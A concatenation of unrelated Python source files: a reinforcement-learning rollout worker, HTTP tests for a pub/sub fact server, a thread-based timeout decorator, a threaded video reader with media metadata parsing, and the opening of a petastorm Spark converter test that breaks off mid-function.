:return: episodic stats, not empty only on the episode boundary
"""
episodic_stats = []
env_actor_states = self.actor_states[env_i]
rewards = self._process_rewards(rewards, env_i)
for agent_i in range(self.num_agents):
actor_state = env_actor_states[agent_i]
actor_state.record_env_step(
rewards[agent_i], dones[agent_i], infos[agent_i], self.traj_buffer_idx, self.rollout_step,
)
actor_state.last_obs = new_obs[agent_i]
actor_state.update_rnn_state(dones[agent_i])
# save episode stats if we are at the episode boundary
if dones[agent_i]:
episodic_stats.append(actor_state.episodic_stats())
return episodic_stats
def _finalize_trajectories(self):
"""
Do some postprocessing when we're done with the rollout.
Also see comments in actor_state.finalize_trajectory (IMPORTANT)
"""
rollouts = []
for env_i in range(self.num_envs):
for agent_i in range(self.num_agents):
actor_state = self.actor_states[env_i][agent_i]
rollout = actor_state.finalize_trajectory(self.rollout_step)
rollout['env_idx'] = env_i
rollout['agent_idx'] = agent_i
rollouts.append(rollout)
return dict(rollouts=rollouts, traj_buffer_idx=self.traj_buffer_idx)
def _format_policy_request(self):
"""
Format data that allows us to request new actions from policies that control the agents in all the envs.
Note how the data required is basically just indices of envs and agents, as well as location of the step
data in the shared rollout buffer. This is enough for the policy worker to find the step data in the shared
data structure.
:return: formatted request to be distributed to policy workers through FIFO queues.
"""
policy_request = dict()
for env_i in range(self.num_envs):
for agent_i in range(self.num_agents):
actor_state = self.actor_states[env_i][agent_i]
policy_id = actor_state.curr_policy_id
# where policy worker should look for the policy inputs for the next step
data = (env_i, agent_i, self.traj_buffer_idx, self.rollout_step)
if policy_id not in policy_request:
policy_request[policy_id] = []
policy_request[policy_id].append(data)
return policy_request
def _prepare_next_step(self):
"""
Write environment outputs to shared memory so policy workers can calculate actions for the next step.
Note how we temporary hold obs and rnn_states in local variables before writing them into shared memory.
We could not do the memory write right away because for that we need the memory location of the NEXT step.
If this is the first step in the new rollout, we need to switch to a new trajectory buffer before we do that
(because the previous trajectory buffer is now used by the learner and we can't used until the learner is
done).
"""
for env_i in range(self.num_envs):
for agent_i in range(self.num_agents):
actor_state = self.actor_states[env_i][agent_i]
actor_state.ready = False
# populate policy inputs in shared memory
policy_inputs = dict(obs=actor_state.last_obs, rnn_states=actor_state.last_rnn_state)
actor_state.set_trajectory_data(policy_inputs, self.traj_buffer_idx, self.rollout_step)
def reset(self, report_queue):
"""
Do the very first reset for all environments in a vector. Populate shared memory with initial obs.
Note that this is called only once, at the very beginning of training. After this the envs should auto-reset.
:param report_queue: we use report queue to monitor reset progress (see appo.py). This can be a lengthy
process.
:return: first requests for policy workers (to generate actions for the very first env step)
"""
for env_i, e in enumerate(self.envs):
observations = e.reset()
if self.cfg.decorrelate_envs_on_one_worker:
decorrelate_steps = self.cfg.rollout * env_i + 1
log.info('Decorrelating experience for %d frames...', decorrelate_steps)
for decorrelate_step in range(decorrelate_steps):
actions = [e.action_space.sample() for _ in range(self.num_agents)]
observations, rew, dones, info = e.step(actions)
for agent_i, obs in enumerate(observations):
actor_state = self.actor_states[env_i][agent_i]
actor_state.set_trajectory_data(dict(obs=obs), self.traj_buffer_idx, self.rollout_step)
# rnn state is already initialized at zero
# log.debug(
# 'Reset progress w:%d-%d finished %d/%d, still initializing envs...',
# self.worker_idx, self.split_idx, env_i + 1, len(self.envs),
# )
report_queue.put(dict(initialized_env=(self.worker_idx, self.split_idx, env_i)))
policy_request = self._format_policy_request()
return policy_request
def advance_rollouts(self, data, timing):
"""
Main function in VectorEnvRunner. Does one step of simulation (if all actions for all actors are available).
:param data: incoming data from policy workers (policy outputs), including new actions
:param timing: this is just for profiling
:return: same as reset(), return a set of requests for policy workers, asking them to generate actions for
the next env step.
"""
with timing.add_time('save_policy_outputs'):
policy_id = data['policy_id']
all_actors_ready = self._process_policy_outputs(policy_id)
if not all_actors_ready:
# not all policies involved sent their actions, waiting for more
return None, None, None
complete_rollouts, episodic_stats = [], []
for env_i, e in enumerate(self.envs):
with timing.add_time('env_step'):
actions = [s.curr_actions() for s in self.actor_states[env_i]]
new_obs, rewards, dones, infos = e.step(actions)
with timing.add_time('overhead'):
stats = self._process_env_step(new_obs, rewards, dones, infos, env_i)
episodic_stats.extend(stats)
self.rollout_step = self.rollout_step + 1
if self.rollout_step == self.cfg.rollout:
# finalize and serialize the trajectory if we have a complete rollout
complete_rollouts = self._finalize_trajectories()
self.rollout_step = 0
self.traj_buffer_idx = (self.traj_buffer_idx + 1) % self.num_traj_buffers
# Wait for the next set of buffers to be released, if it's not ready yet.
# This should be a no-op, unless we are collecting experience faster than we can learn from it, in which
# case this will act as a speed adjusting mechanism.
if self.traj_tensors_available[:, :, self.traj_buffer_idx].min() == 0:
with timing.add_time('wait_buffers'):
self.wait_for_traj_buffers()
self._prepare_next_step()
policy_request = self._format_policy_request()
return policy_request, complete_rollouts, episodic_stats
def wait_for_traj_buffers(self):
"""
In very rare cases the learner might not have freed the shared memory buffer by the time we need it.
Here we wait until the learner is done with it.
"""
print_warning = True
while self.traj_tensors_available[:, :, self.traj_buffer_idx].min() == 0:
if print_warning:
log.warning(
'Waiting for trajectory buffer %d on actor %d-%d',
self.traj_buffer_idx, self.worker_idx, self.split_idx,
)
print_warning = False
time.sleep(0.002)
def close(self):
for e in self.envs:
e.close()
class ActorWorker(ActorWorkerBase):
"""
Top-level class defining the actor worker (rollout worker in the paper, sorry for the confusion, too lazy to rename)
Works with an array (vector) of environments that is processes in portions.
Simple case, env vector is split into two parts:
1. Do an environment step in the 1st half of the vector (envs 1..N/2)
2. Send observations to a queue for action generation elsewhere (e.g. on a GPU worker)
3. Immediately start processing second half of the vector (envs N/2+1..N)
4. By the time second half is processed, actions for the 1st half should be ready. Immediately start processing
the 1st half of the vector again.
As a result, if action generation is fast enough, this env runner should be busy 100% of the time
calculating env steps, without waiting for actions.
This is somewhat similar to double-buffered rendering in computer graphics.
"""
def __init__(
self, cfg, obs_space, action_space, num_agents, worker_idx, shared_buffers,
task_queue, policy_queues, report_queue, learner_queues,
):
"""
Actor.
:param cfg: global config (all CLI params)
:param obs_space: observation space (spaces) of the environment
:param action_space: action space(s)
:param num_agents: number of agents per env (all env should have the same number of agents right now,
although it should be easy to fix)
:param worker_idx: index of this worker process
:param shared_buffers: shared memory data structures initialized in main process (see shared_buffers.py)
:param task_queue: queue for incoming messages for THIS particular actor worker. See the task types in the loop
below, but the most common task is ROLLOUT_STEP, which means "here's your actions, advance simulation by
one step".
:param policy_queues: FIFO queues associated with all policies participating in training. We send requests
for policy queue #N to get actions for envs (agents) that are controlled by policy #N.
:param report_queue: one-way communication with the main process, various stats and whatnot
:param learner_queues: one-way communication with the learner, sending trajectory buffers for learning
"""
super().__init__()
self.cfg = cfg
self.obs_space = obs_space
self.action_space = action_space
self.num_agents = num_agents
self.worker_idx = worker_idx
self.shared_buffers = shared_buffers
self.terminate = False
self.num_complete_rollouts = 0
self.vector_size = cfg.num_envs_per_worker
self.num_splits = cfg.worker_num_splits
assert self.vector_size >= self.num_splits
assert self.vector_size % self.num_splits == 0, 'Vector size should be divisible by num_splits'
self.env_runners = None
self.policy_queues = policy_queues
self.report_queue = report_queue
self.learner_queues = learner_queues
self.task_queue = task_queue
self.reward_shaping = [None for _ in range(self.cfg.num_policies)]
self.process = TorchProcess(target=self._run, daemon=True)
self.process.start()
def _init(self):
"""
Initialize env runners, that actually do all the work. Also we're doing some utility stuff here, e.g.
setting process affinity (this is a performance optimization).
"""
log.info('Initializing envs for env runner %d...', self.worker_idx)
if self.cfg.force_envs_single_thread:
from threadpoolctl import threadpool_limits
threadpool_limits(limits=1, user_api=None)
if self.cfg.set_workers_cpu_affinity:
set_process_cpu_affinity(self.worker_idx, self.cfg.num_workers)
psutil.Process().nice(min(self.cfg.default_niceness + 10, 20))
self.env_runners = []
for split_idx in range(self.num_splits):
env_runner = VectorEnvRunner(
self.cfg, self.vector_size // self.num_splits, self.worker_idx, split_idx, self.num_agents,
self.shared_buffers, self.reward_shaping,
)
env_runner.init()
self.env_runners.append(env_runner)
def _terminate(self):
for env_runner in self.env_runners:
env_runner.close()
self.terminate = True
def _enqueue_policy_request(self, split_idx, policy_inputs):
"""Distribute action requests to their corresponding queues."""
for policy_id, requests in policy_inputs.items():
policy_request = (self.worker_idx, split_idx, requests)
self.policy_queues[policy_id].put(policy_request)
def _enqueue_complete_rollouts(self, split_idx, complete_rollouts):
"""Send complete rollouts from VectorEnv to the learner."""
if self.cfg.sampler_only:
return
rollouts = complete_rollouts['rollouts']
traj_buffer_idx = complete_rollouts['traj_buffer_idx']
# mark the trajectory buffer that we're sending to the learner as unavailable until the learner
# finishes processing
env_runner = self.env_runners[split_idx]
env_runner.traj_tensors_available[:, :, traj_buffer_idx] = 0
rollouts_per_policy = dict()
for rollout in rollouts:
policy_id = rollout['policy_id']
if policy_id not in rollouts_per_policy:
rollouts_per_policy[policy_id] = dict(
rollouts=[], worker_idx=self.worker_idx,
split_idx=split_idx, traj_buffer_idx=traj_buffer_idx,
)
rollouts_per_policy[policy_id]['rollouts'].append(rollout)
for policy_id, rollouts in rollouts_per_policy.items():
self.learner_queues[policy_id].put((TaskType.TRAIN, rollouts))
def _report_stats(self, stats):
for report in stats:
self.report_queue.put(report)
def _handle_reset(self):
"""
Reset all envs, one split at a time (double-buffering), and send requests to policy workers to get
actions for the very first env step.
"""
for split_idx, env_runner in enumerate(self.env_runners):
policy_inputs = env_runner.reset(self.report_queue)
self._enqueue_policy_request(split_idx, policy_inputs)
log.info('Finished reset for worker %d', self.worker_idx)
self.report_queue.put(dict(finished_reset=self.worker_idx))
def _advance_rollouts(self, data, timing):
"""
Process incoming request from policy worker. Use the data (policy outputs, actions) to advance the simulation
by one step on the corresponding VectorEnvRunner.
If we successfully managed to advance the simulation, send requests to policy workers to get actions for the
next step. If we completed the entire rollout, also send request to the learner!
:param data: request from the policy worker, containing actions and other policy outputs
:param timing: profiling stuff
"""
split_idx = data['split_idx']
runner = self.env_runners[split_idx]
policy_request, complete_rollouts, episodic_stats = runner.advance_rollouts(data, timing)
with timing.add_time('complete_rollouts'):
if complete_rollouts:
self._enqueue_complete_rollouts(split_idx, complete_rollouts)
if self.num_complete_rollouts == 0 and not self.cfg.benchmark:
# we just finished our first complete rollouts, perfect time to wait for experience derorrelation
# this guarantees that there won't be any "old" trajectories when we awaken
delay = (float(self.worker_idx) / self.cfg.num_workers) * self.cfg.decorrelate_experience_max_seconds
log.info(
'Worker %d, sleep for %.3f sec to decorrelate experience collection',
self.worker_idx, delay,
)
time.sleep(delay)
log.info('Worker %d awakens!', self.worker_idx)
self.num_complete_rollouts += len(complete_rollouts['rollouts'])
with timing.add_time('enqueue_policy_requests'):
if policy_request is not None:
self._enqueue_policy_request(split_idx, policy_request)
if episodic_stats:
self._report_stats(episodic_stats)
def _process_pbt_task(self, pbt_task):
"""Save the latest version of reward shaping from PBT, we later propagate this to envs."""
task_type, data = pbt_task
if task_type == PbtTask.UPDATE_REWARD_SCHEME:
policy_id, new_reward_shaping_scheme = data
self.reward_shaping[policy_id] = new_reward_shaping_scheme
def _run(self):
"""
Main loop of the actor worker (rollout worker).
Process tasks (mainly ROLLOUT_STEP) until we get the termination signal, which usually means end of training.
Currently there is no mechanism to restart dead workers if something bad happens during training. We can only
retry on the initial reset(). This is definitely something to work on.
"""
log.info('Initializing vector env runner %d...', self.worker_idx)
# workers should ignore Ctrl+C because the termination is handled in the event loop by a special msg
signal.signal(signal.SIGINT, signal.SIG_IGN)
if self.cfg.actor_worker_gpus:
set_gpus_for_process(
self.worker_idx,
num_gpus_per_process=1, process_type='actor', available_gpus=self.cfg.actor_worker_gpus,
)
torch.multiprocessing.set_sharing_strategy('file_system')
timing = Timing()
last_report = time.time()
with torch.no_grad():
while not self.terminate:
try:
try:
with timing.add_time('waiting'), timing.timeit('wait_actor'):
tasks = self.task_queue.get_many(timeout=0.1)
except Empty:
tasks = []
for task in tasks:
task_type, data = task
if task_type == TaskType.INIT:
self._init()
continue
if task_type == TaskType.TERMINATE:
self._terminate()
break
# handling actual workload
if task_type == TaskType.ROLLOUT_STEP:
if 'work' not in timing:
timing.waiting = 0 # measure waiting only after real work has started
with timing.add_time('work'), timing.timeit('one_step'):
self._advance_rollouts(data, timing)
elif task_type == TaskType.RESET:
with timing.add_time('reset'):
self._handle_reset()
elif task_type == TaskType.PBT:
self._process_pbt_task(data)
if time.time() - last_report > 5.0 and 'one_step' in timing:
timing_stats = dict(wait_actor=timing.wait_actor, step_actor=timing.one_step)
memory_mb = memory_consumption_mb()
stats = dict(memory_actor=memory_mb)
self.report_queue.put(dict(timing=timing_stats, stats=stats))
last_report = time.time()
except RuntimeError as exc:
log.warning('Error while processing data w: %d, exception: %s', self.worker_idx, exc)
log.warning('Terminate process...')
self.terminate = True
self.report_queue.put(dict(critical_error=self.worker_idx))
except KeyboardInterrupt:
self.terminate = True
except:
log.exception('Unknown exception in rollout worker')
self.terminate = True
if self.worker_idx <= 1:
time.sleep(0.1)
log.info(
'Env runner %d, CPU aff. %r, rollouts %d: timing %s',
self.worker_idx, psutil.Process().cpu_affinity(), self.num_complete_rollouts, timing,
)
def init(self):
self.task_queue.put((TaskType.INIT, None))
def request_reset(self):
self.task_queue.put((TaskType.RESET, None))
def request_step(self, split, actions):
data = (split, actions)
self.task_queue.put((TaskType.ROLLOUT_STEP, data))
def close(self):
self.task_queue.put((TaskType.TERMINATE, None))
def join(self):
join_or_kill(self.process)
|
http_test.py
|
#! /usr/bin/env python
from datetime import datetime
from httplib import HTTPConnection
from json import dumps, loads
from sys import argv
from threading import Thread
from time import sleep, time as now
from unittest import main, TestCase
from uuid import uuid1
FACTS = [{"headline": "Aliens Land", "body": "They just arriv--AAGH!"},
{"headline": "Moon Eaten", "body": "It's just gone!"},
{"headline": "Bananas Banned", "body": "Bad for teeth."}]
HTML_CONTENT_TYPE = 'text/html; charset=utf-8'
TEXT_CONTENT_TYPE = 'text/plain; charset=utf-8'
JSON_CONTENT_TYPE = 'application/json'
class HTTPTest(TestCase):
def setUp(self):
self.url, self.port = argv[1], int(argv[2])
self.conn = HTTPConnection(self.url, self.port)
def test_home(self):
self._visit(verb='GET', path='/',
exp_status=200, exp_content_type=HTML_CONTENT_TYPE)
def test_publish_valid_fact(self):
topic = self._new_unique_topic()
self._visit(verb='POST', path='topics/%s/facts' % (topic,),
exp_status=202, exp_content_type=TEXT_CONTENT_TYPE,
content=dumps(FACTS[0]))
def test_publish_invalid_fact(self):
topic = self._new_unique_topic()
self._visit(verb='POST', path='topics/%s/facts' % (topic,),
exp_status=400, exp_content_type=TEXT_CONTENT_TYPE,
content='invalid fact')
def test_retrieve_fact(self):
topic = self._new_unique_topic()
self._publish_fact(topic, FACTS[0])
sleep(0.1)
response = self._visit(verb='GET', path='topics/%s/facts' % (topic,),
exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
returned_facts = loads(response.read())
self.assertEqual(1, len(returned_facts))
raw_fact = self._check_and_extract(returned_facts[0])
self.assertEqual(FACTS[0], raw_fact)
def test_retrieve_facts_after_id(self):
topic = self._new_unique_topic()
map(lambda f: self._publish_fact(topic, f), FACTS)
sleep(0.1)
response = self._visit(verb='GET', path='topics/%s/facts' % (topic,),
exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
all_ids = self._extract_fact_ids(response)
first_id = min(all_ids)
path = 'topics/%s/facts?after_id=%d' % (topic, first_id)
response = self._visit(verb='GET', path=path, exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
returned_ids = self._extract_fact_ids(response)
self.assertEqual(all_ids[1:], returned_ids)
def test_subscribe_and_retrieve(self):
topic = self._new_unique_topic()
response = self._visit(verb='POST',
path='topics/%s/subscriptions' % (topic,),
exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
sub_id = loads(response.read())['subscription_id']
self._publish_fact(topic, FACTS[0])
path = '/topics/%s/subscriptions/%s/next' % (topic, sub_id)
response = self._visit(verb='GET', path=path, exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
self.assertEqual(FACTS[0], loads(response.read()))
self._assertHeadersPreventCaching(dict(response.getheaders()))
def test_subscribe_and_timeout(self):
topic = self._new_unique_topic()
response = self._visit(verb='POST',
path='topics/%s/subscriptions' % (topic,),
exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
sub_id = loads(response.read())['subscription_id']
path = '/topics/%s/subscriptions/%s/next' % (topic, sub_id)
start = now()
response = self._visit(verb='GET', path=path,
headers={'Patience': '1'},
exp_status=204,
exp_content_type=TEXT_CONTENT_TYPE)
response.read()
duration = now() - start
self.assertTrue(duration < 2,
'Should wait only as specified in Patience header')
def test_nonexistent_subscription_id(self):
topic = self._new_unique_topic()
path = '/topics/%s/subscriptions/nonexistent/next' % (topic,)
response = self._visit(verb='GET', path=path,
exp_status=404,
exp_content_type=TEXT_CONTENT_TYPE)
response.read()
def test_retrieve_topics(self):
topic1 = self._new_unique_topic()
self._publish_fact(topic1, FACTS[0])
topic2 = self._new_unique_topic()
self._publish_fact(topic2, FACTS[1])
sleep(0.1)
response = self._visit(verb='GET', path='topics', exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
topics = map(lambda x: x['topic_name'], loads(response.read()))
self.assertIn(topic1, topics)
self.assertIn(topic2, topics)
def test_simultaneous_requests(self):
topic = self._new_unique_topic()
response = self._visit(verb='POST',
path='topics/%s/subscriptions' % (topic,),
exp_status=200,
exp_content_type=JSON_CONTENT_TYPE)
sub_id = loads(response.read())['subscription_id']
thread = Thread(target=self._wait_on_sub, args=(topic, sub_id))
thread.daemon = True
thread.start()
sleep(0.5)
conn = HTTPConnection(self.url, self.port)
conn.request('GET', 'topics', '', {})
conn.getresponse().read()
self.assertTrue(thread.is_alive(),
msg='Should run two queries at once')
thread.join()
def _wait_on_sub(self, topic, sub_id):
conn = HTTPConnection(self.url, self.port)
path = '/topics/%s/subscriptions/%s/next' % (topic, sub_id)
conn.request('GET', path, '', {'Patience': '2'})
conn.getresponse().read()
def _extract_fact_ids(self, response):
return map(lambda f: f['combo_id'], loads(response.read()))
def _visit(self, verb, path,
exp_status, exp_content_type,
headers={}, content=''):
self.conn.request(verb, path, content, headers)
response = self.conn.getresponse()
self.assertEqual(exp_status, response.status)
actual_content_type = response.getheader('Content-Type')
self.assertEqual(exp_content_type, actual_content_type)
return response
def _publish_fact(self, topic, fact):
response = self._visit(verb='POST',
path='topics/%s/facts' % (topic,),
exp_status=202,
exp_content_type=TEXT_CONTENT_TYPE,
content=dumps(fact))
response.read()
def _check_and_extract(self, returned_fact):
raw_fact = dict(returned_fact)
for key in ['combo_id', 'combo_timestamp', 'combo_topic']:
self.assertIn(key, returned_fact)
del raw_fact[key]
return raw_fact
def _new_unique_topic(self):
return str(uuid1())
def _assertHeadersPreventCaching(self, headers):
self.assertEqual('no-cache, must-revalidate',
headers['cache-control'])
expires = datetime.strptime(headers['expires'],
'%a, %d %b %Y %H:%M:%S GMT')
self._assertIsInPast(expires, 'Should expire in the past')
def _assertIsInPast(self, date, msg):
self.assertTrue(date < datetime.now(), msg)
if __name__ == '__main__':
main(argv=['http_test.py'])
|
timeout.py
|
import sys
import threading
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method.
Come from:
Kill a thread in Python:
http://mail.python.org/pipermail/python-list/2004-May/260937.html
"""
def __init__(self, *args, **kwargs):
threading.Thread.__init__(self, *args, **kwargs)
self.killed = False
self.__run_backup = self.run
self.run = self.__run # Force the Thread to install our trace.
def start(self):
"""Start the thread."""
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
class TimeoutException(Exception):
"""function run timeout"""
pass
def timeout(seconds):
"""
超时装饰器,指定超时时间
若被装饰的方法在指定的时间内未返回,则抛出Timeout异常
"""
def timeout_decorator(func):
"""真正的装饰器"""
def _new_func(oldfunc, result, oldfunc_args, oldfunc_kwargs):
result.append(oldfunc(*oldfunc_args, **oldfunc_kwargs))
def _(*args, **kwargs):
result = []
new_kwargs = { # create new args for _new_func, because we want to get the func return val to result list
'oldfunc': func,
'result': result,
'oldfunc_args': args,
'oldfunc_kwargs': kwargs
}
thd = KThread(target=_new_func, args=(), kwargs=new_kwargs)
thd.start()
thd.join(seconds)
alive = thd.is_alive()
thd.kill() # kill the child thread
if alive:
raise TimeoutException(u'function run too long, timeout %d seconds.' % seconds)
else:
return result[0]
_.__name__ = func.__name__
_.__doc__ = func.__doc__
return _
return timeout_decorator
|
video_utils.py
|
#############################################################################
#
# VFRAME
# MIT License
# Copyright (c) 2020 Adam Harvey and VFRAME
# https://vframe.io
#
#############################################################################
from pathlib import Path
from datetime import datetime
import time
from threading import Thread
from queue import Queue
from pymediainfo import MediaInfo
from PIL import Image
import cv2 as cv
import dacite
import imagehash
from vframe.settings import app_cfg
from vframe.settings.app_cfg import LOG
from vframe.models.mediameta import MediaMeta
from vframe.utils import file_utils
from vframe.utils.im_utils import pil2np, np2pil, resize
# --------------------------------------------------------------
# based on code from jrosebr1 (PyImageSearch)
# from imutils.video
# https://raw.githubusercontent.com/jrosebr1/imutils/master/imutils/video/filevideostream.py
# --------------------------------------------------------------
"""
TODO
- improve error handling on empty container MP4s by inspecting video properties
- improve image/video separation
"""
class FileVideoStream:
frame_count = 0
def __init__(self, fp, queue_size=512, use_prehash=False):
"""Threaded video reader
"""
# TODO: cv.CAP_FFMPEG, cv.CAP_GSTREAMER
# self.vcap = cv.VideoCapture(str(fp), cv.CAP_FFMPEG)
self.is_image = Path(fp).suffix[1:].lower() in ['jpg', 'png']
self.use_prehash = use_prehash
# TODO: explore further. currently not working
# self.vcap.set(cv.CAP_PROP_HW_ACCELERATION, 0.0)
# self.vcap.set(cv.CAP_PROP_HW_DEVICE, 0.0)
# LOG.debug(f'CAP_PROP_HW_ACCELERATION: {self.vcap.get(cv.CAP_PROP_HW_ACCELERATION)}')
# LOG.debug(f'CAP_PROP_HW_DEVICE: {self.vcap.get(cv.CAP_PROP_HW_DEVICE)}')
# LOG.debug(f'Using backend:: {self.vcap.getBackendName()}')
# self.vcap.set(cv.CAP_PROP_BUFFERSIZE, 1024*20)
if self.is_image:
self.fps = 25.0 # default 25.0 for still image
im = Image.open(fp)
self.width, self.height = im.size
self.dim = (self.width, self.height)
self.index = -1
self.frame_read_index = 0
self.stopped = True
self.frame_count = 1
self.queue = Queue(maxsize=1)
self.queue.put(im)
else:
self.vcap = cv.VideoCapture(str(fp), cv.CAP_FFMPEG)
self.queue = Queue(maxsize=queue_size)
try:
self.height = int(self.vcap.get(cv.CAP_PROP_FRAME_HEIGHT))
self.width = int(self.vcap.get(cv.CAP_PROP_FRAME_WIDTH))
if file_utils.get_ext(fp).lower() in app_cfg.VALID_PIPE_IMAGE_EXTS:
self.frame_count = 1 # force set image to 1 frame
else:
self.frame_count = int(self.vcap.get(cv.CAP_PROP_FRAME_COUNT))
self.vcap_cc = self.vcap.get(cv.CAP_PROP_FOURCC)
self.fps = self.vcap.get(cv.CAP_PROP_FPS) # default 25.0 for still image
self.stopped = False
self.index = -1
# initialize queue used to store frames
if self.use_prehash:
self.queue_phash = Queue(maxsize=queue_size)
# initialize thread
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.frame_read_index = 0
self.spf = 1 / self.fps # seconds per frame
self.mspf = self.spf * 1000 # milliseconds per frame
except Exception as e:
# TODO: add error loggin
LOG.error(f'Skipping corrupt file: {fp}. Error: {e}')
self.dim = (self.width, self.height)
def start(self):
# start a thread to read frames from the file video stream
if self.frame_count > 0:
if not self.is_image:
self.thread.start()
return self
else:
return None
def update(self):
# keep looping infinitely
while True:
if self.stopped:
break
if not self.queue.full():
(frame_ok, frame) = self.vcap.read()
self.frame_read_index += 1
if not frame_ok:
self.stopped = True
break
else:
# frame
self.queue.put(frame)
# add phash
if self.use_prehash:
frame = cv.resize(frame, (32, 32), interpolation=cv.INTER_NEAREST)
frame = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
phash = imagehash.phash(np2pil(frame))
self.queue_phash.put(phash)
else:
time.sleep(0.1)
if not self.is_image:
self.vcap.release()
def release(self):
if self.frame_count > 0:
del self.queue
if self.use_prehash:
del self.queue_phash
if not self.is_image:
self.vcap.release()
def read_frame(self):
# return next frame in the queue
self.index += 1
if self.is_image:
return pil2np(self.queue.get())
else:
return self.queue.get()
def read_frame_phash(self):
# return next frame in the queue
self.index += 1
if self.is_image:
return (pil2np(self.queue.get()), self.queue_phash.get())
else:
return (self.queue.get(), self.queue_phash.get())
# check if all available video frames read
def running(self):
return self.more() or not self.stopped
def more(self):
# return True if there are still frames in the queue. If stream is not stopped, try to wait a moment
tries = 0
while self.queue.qsize() == 0 and not self.stopped and tries < 5:
time.sleep(0.1)
tries += 1
return self.queue.qsize() > 0
def stop(self):
if self.frame_count > 0:
# indicate that the thread should be stopped
self.stopped = True
# wait until stream resources are released (producer thread might be still grabbing frame)
if not self.is_image:
self.thread.join()
def mediainfo(fp_in):
"""Returns abbreviated video/audio metadata for video files
:param fp_in: filepath"""
# extension and media type
ext = file_utils.get_ext(fp_in)
if ext in app_cfg.VALID_PIPE_IMAGE_EXTS:
media_type = 'image'
elif ext in app_cfg.VALID_PIPE_VIDEO_EXTS:
media_type = 'video'
else:
media_type = 'invalid'
# init data
data = {
'filename': Path(fp_in).name,
'ext': ext,
'media_type': media_type
}
if media_type == 'image':
# extend image metadata
try:
im = Image.open(fp_in)
width, height = im.size
data.update({'width': width, 'height': height})
except Exception as e:
log.error(f'{fp_in} not valid. Skipping.')
data.update({'valid': False})
elif media_type == 'video':
# extend video metadata if available
attrs = MediaInfo.parse(fp_in).to_data()
video_attrs = [x for x in attrs['tracks'] if x['track_type'] == 'Video']
general_attrs = [x for x in attrs['tracks'] if x['track_type'] == 'General']
#audio_attrs = [x for x in attrs['tracks'] if x['track_type'] == 'Audio']
if video_attrs and general_attrs:
video_attrs = video_attrs[0]
general_attrs = general_attrs[0]
# use float, then int to avoid "invalid literal for int() errors"
if 'encoded_date' in general_attrs.keys():
encoded_date = str(general_attrs.get('encoded_date', ''))
created_at = str(datetime.strptime(encoded_date, '%Z %Y-%m-%d %H:%M:%S'))
elif 'file_last_modification_date' in general_attrs.keys():
encoded_date = str(general_attrs.get('file_last_modification_date', ''))
created_at = str(datetime.strptime(encoded_date, '%Z %Y-%m-%d %H:%M:%S'))
else:
created_at = str(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
app_cfg.LOG.warn(f'No date available for {fp_in}. Using now()')
data.update({
'codec': video_attrs.get('codec_id', ''),
'duration': int(float(video_attrs.get('duration', 0))),
'aspect_ratio': float(video_attrs.get('display_aspect_ratio', 0)),
'width': int(video_attrs.get('width', 0)),
'height': int(video_attrs.get('height', 0)),
'frame_rate': float(video_attrs.get('frame_rate', 0)),
'frame_count': int(float(video_attrs.get('frame_count', 0))),
'created_at': created_at
})
else:
log.error(f'{fp_in} not valid. Skipping')
data.update({'valid': False})
mediameta = dacite.from_dict(data=data, data_class=MediaMeta)
return mediameta
|
test_spark_dataset_converter.py
|
# Copyright (c) 2020 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import sys
import tempfile
import threading
import time
from distutils.version import LooseVersion
import numpy as np
import pyspark
import pytest
import py4j
import tensorflow.compat.v1 as tf # pylint: disable=import-error
from pyspark.sql.functions import pandas_udf
from pyspark.sql.types import (ArrayType, BinaryType, BooleanType, ByteType,
DoubleType, FloatType, IntegerType, LongType,
ShortType, StringType, StructField, StructType)
from six.moves.urllib.parse import urlparse
from petastorm import make_batch_reader
from petastorm.fs_utils import FilesystemResolver
from petastorm.spark import (SparkDatasetConverter, make_spark_converter,
spark_dataset_converter)
from petastorm.spark.spark_dataset_converter import (
_check_dataset_file_median_size, _check_parent_cache_dir_url,
_check_rank_and_size_consistent_with_horovod, _check_url,
_get_horovod_rank_and_size, _get_spark_session, _make_sub_dir_url,
register_delete_dir_handler, _wait_file_available)
try:
from mock import mock
except ImportError:
from unittest import mock
from petastorm.tests.test_tf_utils import create_tf_graph
@create_tf_graph
def test_primitive(spark_test_ctx):
schema = StructType([
StructField("bool_col", BooleanType(), False),
StructField("float_col", FloatType(), False),
StructField("double_col", DoubleType(), False),
StructField("short_col", ShortType(), False),
StructField("int_col", IntegerType(), False),
StructField("long_col", LongType(), False),
StructField("str_col", StringType(), False),
StructField("bin_col", BinaryType(), False),
StructField("byte_col", ByteType(), False),
])
df = spark_test_ctx.spark.createDataFrame(
[(True, 0.12, 432.1, 5, 5, 0, "hello",
bytearray(b"spark\x01\x02"), -128),
(False, 123.45, 0.987, 9, 908, 765, "petastorm",
bytearray(b"\x0012345"), 127)],
schema=schema).coalesce(1)
# If we use numPartition > 1, the order of the loaded dataset would
# be non-deterministic.
expected_df = df.collect()
converter = make_spark_converter(df)
with converter.make_tf_dataset() as dataset:
iterator = dataset.make_one_shot_iterator()
tensor = iterator.get_next()
with tf.Session() as sess:
ts = sess.run(tensor)
# TODO: we will improve the test once the batch_size argument
# added.
# Now we only have one batch.
for i in range(converter.dataset_size):
for col in df.schema.names:
actual_ele = getattr(ts, col)[i]
expected_ele = expected_df[i][col]
if col == "str_col":
actual_ele = actual_ele.decode()
